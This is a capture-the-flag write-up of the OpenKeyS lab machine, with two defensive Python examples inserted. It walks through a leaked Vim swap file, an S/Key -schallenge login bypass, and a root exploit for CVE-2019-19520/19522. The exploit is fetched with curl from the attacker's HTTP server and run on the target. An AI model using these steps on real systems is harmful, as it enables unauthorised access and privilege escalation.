OpenKeyS Writeup
Introduction :
OpenKeyS is an Easy (but marked as Medium) OpenBSD box released back in July 2020.
Part 1 : Initial Enumeration
As always we begin our enumeration with Nmap to find open ports. We will be using the flags -sC for default scripts and -sV to enumerate service versions.
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -vvv -p- 10.10.10.199 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -sCV -p22,80 10.10.10.199
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 21:12 CEST
Nmap scan report for 10.10.10.199
Host is up (0.47s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Part 2 : Getting User Access
Our nmap scan picked up port 80, which hosts a simple login page:
Let's enumerate the web service using gobuster:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ gobuster dir -q -t 50 -u http://10.10.10.199 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt
/includes (Status: 301) [Size: 443] [--> http://10.10.10.199/includes/]
/js (Status: 301) [Size: 443] [--> http://10.10.10.199/js/]
/css (Status: 301) [Size: 443] [--> http://10.10.10.199/css/]
/images (Status: 301) [Size: 443] [--> http://10.10.10.199/images/]
/index.php (Status: 200) [Size: 4837]
/fonts (Status: 301) [Size: 443] [--> http://10.10.10.199/fonts/]
/. (Status: 200) [Size: 96]
We found the /includes directory so let's check it from our web browser:
Here we see that we have access to the auth.php.swp file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/includes/auth.php.swp
--2021-06-26 21:20:14-- http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’
auth.php.swp [ <=> ] 12.00K 12.8KB/s in 0.9s
2021-06-26 21:20:16 (12.8 KB/s) - ‘auth.php.swp’ saved [12288]
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
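The `file` output above comes straight from the swap file's header. As an added example (not code from the original writeup), here is a parser for that header plus a small filter for editor leftovers that should never reach a web root; the layout follows vim's block0 structure (memline.c), and SAMPLE_SWP is constructed to mirror the values `file` reported, with made-up mtime and inode filler.

```python
"""Read the metadata a leaked Vim swap (.swp) file exposes.

Added example, not code from the original writeup. Field layout is vim's
block0 header: b0_id[2], b0_version[10], then page_size, mtime, ino, pid as
little-endian 32-bit counters, then b0_uname[40], b0_hname[40], b0_fname[900].
"""
import fnmatch
import struct

_BLOCK0 = struct.Struct("<2s10s4I40s40s900s")   # 1008 bytes in total
_MAGIC = b"b0VIM"
# Editor and backup leftovers that should never be deployed to a web root.
LEFTOVER_GLOBS = ("*.swp", "*.swo", "*.swn", "*~", ".*.sw?", "*.bak", "*.orig")


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width string field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def is_vim_swap(data: bytes) -> bool:
    """True when the bytes start with a complete Vim block0 header."""
    return len(data) >= _BLOCK0.size and data.startswith(_MAGIC)


def parse_swap_header(data: bytes) -> dict:
    """Return version, pid, user, host and original path from a .swp block0."""
    if not is_vim_swap(data):
        raise ValueError("not a Vim swap file")
    _id, ver, page, mtime, ino, pid, uname, hname, fname = _BLOCK0.unpack_from(data)
    ver = _cstr(ver)                       # stored as "VIM 8.1"
    return {
        "version": ver[4:] if ver.startswith("VIM ") else ver,
        "page_size": page, "mtime": mtime, "inode": ino, "pid": pid,
        "user": _cstr(uname), "host": _cstr(hname), "file": _cstr(fname),
    }


def leftover_files(names):
    """Filter file names down to editor/backup leftovers worth removing."""
    return sorted(n for n in names if any(fnmatch.fnmatch(n, g) for g in LEFTOVER_GLOBS))


# Constructed sample header with the values `file` printed for auth.php.swp.
SAMPLE_SWP = _BLOCK0.pack(b"b0", b"VIM 8.1", 4096, 1593000000, 1234, 49850,
                          b"jennifer", b"openkeys.htb",
                          b"/var/www/htdocs/includes/auth.php")
```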
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat auth.php.swp
3210#! Utp=adniferopenkeys.htb/var/www/htdocs/includes/auth.php
@sWB@? mgC
v
p
n
m
U
S
0
J
?>} session_start(); session_destroy(); session_unset();{function close_session()} $_SESSION["username"] = $_REQUEST['username']; $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT']; $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR']; $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME']; $_SESSION["login_time"] = $_SERVER['REQUEST_TIME']; $_SESSION["logged_in"] = True;{function init_session()} } return False; { else } } return True; $_SESSION['last_activity'] = $time; // Session is active, update last activity time and return True { else } return False; close_session(); { ($time - $_SESSION['last_activity']) > $session_timeout) if (isset($_SESSION['last_activity']) && $time = $_SERVER['REQUEST_TIME']; // Has the session expired? { if(isset($_SESSION["logged_in"])) // Is the user logged in? session_start(); // Start the session $session_timeout = 300; // Session timeout in seconds{function is_active_session()} return $retcode; system($cmd, $retcode); $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<****?php%
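The authenticate() function recovered from the swap file builds one command string with escapeshellcmd(), which escapes shell metacharacters but leaves a word such as -schallenge untouched, so it reaches check_auth where a username was expected. As an added example (not code from the original writeup), a simplified Python re-implementation of escapeshellcmd() next to a hardened builder; the allowlist pattern and the leading-dash rule are this example's own choices.

```python
"""Argument injection through escapeshellcmd(), re-created from auth.php.

Added example, not code from the original writeup. php_escapeshellcmd() is
a simplified port of PHP's escapeshellcmd() (it skips PHP's handling of
unpaired quotes). hardened_argv() shows the fix: validate, then pass an
argv list to the helper with no shell involved.
"""
import re

# Characters PHP's escapeshellcmd() prefixes with a backslash.
_SHELL_META = set("#&;`|*?~<>^()[]{}$\\\n\xff")
# Usernames we are willing to hand to the helper: no leading '-', no spaces.
_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HELPER = "../auth_helpers/check_auth"


def php_escapeshellcmd(s: str) -> str:
    """Escape shell metacharacters the way escapeshellcmd() does (quotes aside)."""
    return "".join(("\\" + ch) if ch in _SHELL_META else ch for ch in s)


def vulnerable_cmd(username: str, password: str) -> str:
    """What auth.php runs: metacharacters are neutralised, option-like words are not."""
    return php_escapeshellcmd(HELPER + " " + username + " " + password)


def hardened_argv(username: str, password: str) -> list:
    """Validate both inputs and build an argv list for subprocess.run(argv).

    Without a shell, ';' and friends carry no meaning; the remaining risk is
    an argument the helper parses as an option, so a leading '-' is refused.
    """
    if not _USERNAME_RE.match(username):
        raise ValueError("username rejected by allowlist")
    if password.startswith("-") or "\0" in password:
        raise ValueError("password would be parsed as an option")
    return [HELPER, username, password]


def accepts(username: str, password: str) -> bool:
    """True when the hardened builder would pass the pair on to the helper."""
    try:
        hardened_argv(username, password)
        return True
    except ValueError:
        return False
```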
Once we have the .swp file we know it was created by the user jennifer on the host openkeys.htb, and that auth.php calls ../auth_helpers/check_auth. We add openkeys.htb to our hosts file and download the helper:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.199 openkeys.htb' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 openkeys.htb
PING openkeys.htb (10.10.10.199) 56(84) bytes of data.
64 bytes from openkeys.htb (10.10.10.199): icmp_seq=1 ttl=254 time=470 ms
--- openkeys.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 469.674/469.674/469.674/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/auth_helpers/check_auth
--2021-06-26 21:23:30-- http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’
check_auth 100%[======================================================================================================================================================>] 12.00K 12.8KB/s in 0.9s
2021-06-26 21:23:32 (12.8 KB/s) - ‘check_auth’ saved [12288/12288]
We check what kind of file check_auth is:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ rabin2 -I check_auth
arch x86
baddr 0x0
binsz 10495
bintype elf
bits 64
canary false
retguard false
class ELF64
compiler Linker: LLD 8.0.1
crypto false
endian little
havecode true
intrp /usr/libexec/ld.so
laddr 0x0
lang c
linenum true
lsyms true
machine AMD x86-64 architecture
maxopsz 16
minopsz 1
nx true
os openbsd
pcalign 0
pic true
relocs true
relro partial
rpath NONE
sanitiz false
static false
stripped false
subsys openbsd
va true
Here we see that check_auth is an OpenBSD binary (note the /usr/libexec/ld.so interpreter), and after a bit of googling we stumble upon an authentication bypass that uses -schallenge as the password inside the cookie. So let's intercept the POST request to the index.php login page we found earlier using Burp Suite:
Obviously if we send it as it is we get an authentication denied error:
So let's try the authentication bypass by going through the PHP cookie we mentioned earlier:
We follow the redirection:
And we get an SSH key! Now let's save it locally and use it to log in as jennifer:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat pkey
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ chmod 600 pkey
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ ssh -i pkey jennifer@openkeys.htb
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb,10.10.10.199' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to log in via SSH as the user jennifer and get the user flag.
Part 3 : Getting Root Access
Now in order to privesc this box let's first enumerate it using linpeas.sh:
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ cp /home/nothing/HTB/Admirer/linpeas.sh .
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
openkeys$ curl http://10.10.14.11:9090/linpeas.sh > /tmp/peas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 333k 100 333k 0 0 66009 0 0:00:05 0:00:05 --:--:-- 80533
openkeys$ chmod +x /tmp/peas.sh
openkeys$ /tmp/peas.sh
We let linpeas.sh run for a bit and, scrolling through the output, we stumble upon xlock. That's the hint to look up xlock privesc vulnerabilities, and we find CVE-2019-19520. So we upload the privesc script onto the box:
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/openkeys]
→ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot -O exploit.sh
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
openkeys$ curl http://10.10.14.11:9090/exploit.sh > exploit.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4087 100 4087 0 0 4315 0 --:--:-- --:--:-- --:--:-- 4311
openkeys$ file exploit.sh
exploit.sh: Bourne shell script text executable
openkeys$ chmod +x exploit.sh
openkeys$ ./exploit.sh
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions
WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# cat /root/root.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to privesc to the root user and print the root flag.
Conclusion
Here we can see the progress graph :
Nihilist